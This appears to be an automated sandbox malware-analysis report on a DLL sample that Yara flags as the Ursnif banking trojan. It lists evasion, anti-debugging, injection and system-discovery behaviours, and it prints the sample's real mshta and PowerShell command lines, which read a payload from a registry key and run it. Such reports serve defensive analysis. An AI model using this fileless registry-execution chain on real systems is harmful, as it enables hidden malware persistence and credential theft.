Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3804

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5280	Thread sleep count: 32 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5280	Thread sleep count: 74 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2964	Thread sleep count: 33 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Queries a list of all running processes

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

May try to detect the Windows Explorer process (often used for injection)

Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_01409135 cpuid

0_2_01409135

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query local / system time

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001456 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_10001456

Contains functionality to query the account / user name

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_01409135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_01409135

Contains functionality to query windows version

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_10001F0E

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358574602.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341005235.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452703813.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358543809.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358526121.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358423422.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358490581.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341021111.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358326330.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340830267.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452659371.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358587293.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340789162.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358440799.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340944106.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358282465.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358549744.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452359075.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358639536.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452511017.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.478007505.000000000492C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.450359527.000000000507C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340988909.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358200334.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452558605.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358380196.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452589252.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358524105.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358621357.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340893376.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5288, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5292, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5324, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5276, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358574602.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341005235.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452703813.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358543809.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358526121.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358423422.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358490581.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341021111.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358326330.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340830267.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452659371.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358587293.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340789162.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358440799.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340944106.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358282465.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358549744.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452359075.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358639536.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452511017.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.478007505.000000000492C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.450359527.000000000507C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340988909.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358200334.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452558605.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358380196.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452589252.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358524105.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358621357.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340893376.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5288, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5292, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5324, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5276, type: MEMORY